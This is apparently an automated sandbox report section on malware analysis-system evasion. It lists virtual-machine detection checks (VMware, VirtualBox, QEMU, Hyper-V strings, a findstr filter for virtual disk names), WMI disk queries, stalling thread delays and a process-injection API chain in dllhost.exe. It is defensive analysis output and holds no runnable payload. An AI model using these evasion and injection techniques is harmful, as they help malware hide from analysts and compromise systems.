Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,38_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxMiniRdrDN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4320Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5554Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3777
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3190
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5007
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2046
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 456
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 403
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 379
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 373
Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1708
Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 446
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 368
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 363
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcess
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_35-245
Source: C:\Windows\System32\cmd.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_19-16840
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcess
Source: C:\Windows\System32\svchost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\cmd.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exeAPI coverage: 9.1 %
Source: C:\Windows\System32\lsass.exeAPI coverage: 9.4 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\dwm.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.3 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 4.5 %
Source: C:\Windows\System32\wbem\WMIADAP.exeAPI coverage: 8.2 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep count: 4320 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208Thread sleep count: 5554 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6660Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144Thread sleep count: 6009 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144Thread sleep count: 3777 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852Thread sleep count: 5007 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 984Thread sleep count: 2046 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 4428Thread sleep count: 287 > 30
Source: C:\Windows\System32\dllhost.exe TID: 2484Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 6640Thread sleep count: 456 > 30
Source: C:\Windows\System32\winlogon.exe TID: 6640Thread sleep time: -45600s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 2344Thread sleep count: 273 > 30
Source: C:\Windows\System32\svchost.exe TID: 4948Thread sleep count: 403 > 30
Source: C:\Windows\System32\svchost.exe TID: 4948Thread sleep time: -40300s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 1236Thread sleep count: 201 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616Thread sleep count: 379 > 30
Source: C:\Windows\System32\svchost.exe TID: 3616Thread sleep time: -37900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5448Thread sleep count: 373 > 30
Source: C:\Windows\System32\svchost.exe TID: 5448Thread sleep time: -37300s >= -30000s
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3228Thread sleep count: 1708 > 30
Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 3228Thread sleep count: 446 > 30
Source: C:\Windows\System32\svchost.exe TID: 6108Thread sleep count: 368 > 30
Source: C:\Windows\System32\svchost.exe TID: 6108Thread sleep time: -36800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5576Thread sleep count: 363 > 30
Source: C:\Windows\System32\svchost.exe TID: 5576Thread sleep time: -36300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1880Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 1880Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2124Thread sleep count: 342 > 30
Source: C:\Windows\System32\svchost.exe TID: 2124Thread sleep time: -34200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6024Thread sleep count: 298 > 30
Source: C:\Windows\System32\svchost.exe TID: 3744Thread sleep count: 322 > 30
Source: C:\Windows\System32\svchost.exe TID: 3744Thread sleep time: -32200s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3264Thread sleep count: 323 > 30
Source: C:\Windows\System32\svchost.exe TID: 3264Thread sleep time: -32300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6240Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6240Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6336Thread sleep count: 309 > 30
Source: C:\Windows\System32\svchost.exe TID: 6336Thread sleep time: -30900s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6380Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6380Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6448Thread sleep count: 300 > 30
Source: C:\Windows\System32\svchost.exe TID: 6448Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6516Thread sleep count: 299 > 30
Source: C:\Windows\System32\svchost.exe TID: 6688Thread sleep count: 294 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\wbem\WMIADAP.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390D894 FindFirstFileExW,19_2_000002241390D894
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_000002241390DA18
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393D894 FindFirstFileExW,19_2_000002241393D894
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_000002241393DA18
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3D894 FindFirstFileExW,20_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_0000026504EADA18
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EAD894 FindFirstFileExW,37_2_0000026504EAD894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACD894 FindFirstFileExW,38_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CED894 FindFirstFileExW,38_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64D894 FindFirstFileExW,39_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67D894 FindFirstFileExW,39_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,40_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AED894 FindFirstFileExW,40_2_00000202C0AED894
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130D894 FindFirstFileExW,41_2_000002A66130D894
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCD894 FindFirstFileExW,42_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4D894 FindFirstFileExW,42_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CD894 FindFirstFileExW,43_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,43_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4D894 FindFirstFileExW,43_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,43_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,44_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537AD894 FindFirstFileExW,44_2_00000179537AD894
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,44_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DD894 FindFirstFileExW,44_2_00000179537DD894
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,45_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653D894 FindFirstFileExW,45_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,46_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56D894 FindFirstFileExW,46_2_000002295D56D894
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: Amcache.hve.10.drBinary or memory string: VMware
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxservice
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxsf.sys
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: VMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: svchost.exe, 00000030.00000002.3005591334.000001845AC2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: NECVMWarVMware SATA CD00
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
Source: cmd.exe, 00000013.00000003.2083609583.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085257031.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085855678.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2084489555.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2084133578.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2086602704.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2082690674.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2085736368.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2082095231.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2081856239.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2086221722.0000022413295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0T2B0A" /c:"QEMU HARDDISK" K
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
Source: Microsoft-Windows-Storsvc%4Diagnostic.evtx.50.drBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
Source: svchost.exe, 00000029.00000000.2461945844.000002A66062A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: System.evtx.50.drBinary or memory string: VMCI: Using capabilities (0x1c).
Source: Amcache.hve.10.drBinary or memory string: vmci.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemu-ga
Source: cmd.exe, 00000013.00000003.2069301255.0000022413295000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.2069201279.0000022413295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicshutdown
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemuwmi2y
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC3EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: nonicNECVMWarVMware SATA CD00
Source: svchost.exe, 00000032.00000000.2526982413.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3012792794.000001D55862B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmusrvc2y
Source: Amcache.hve.10.drBinary or memory string: VMware20,1
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicvss
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
Source: svchost.exe, 00000032.00000000.2531567610.000001D5592C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.50.drBinary or memory string: VMware
Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.drBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxguest.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmmouse.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
Source: lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC21D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: QEMU HARDDISK
Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC5B9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxmouse.sys
Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\Program Files\VMware
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.50.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: powershell.exe, 00000007.00000002.2075248949.000001FDBC4C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxMouse.sys
Source: dwm.exe, 0000002A.00000002.3088029221.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
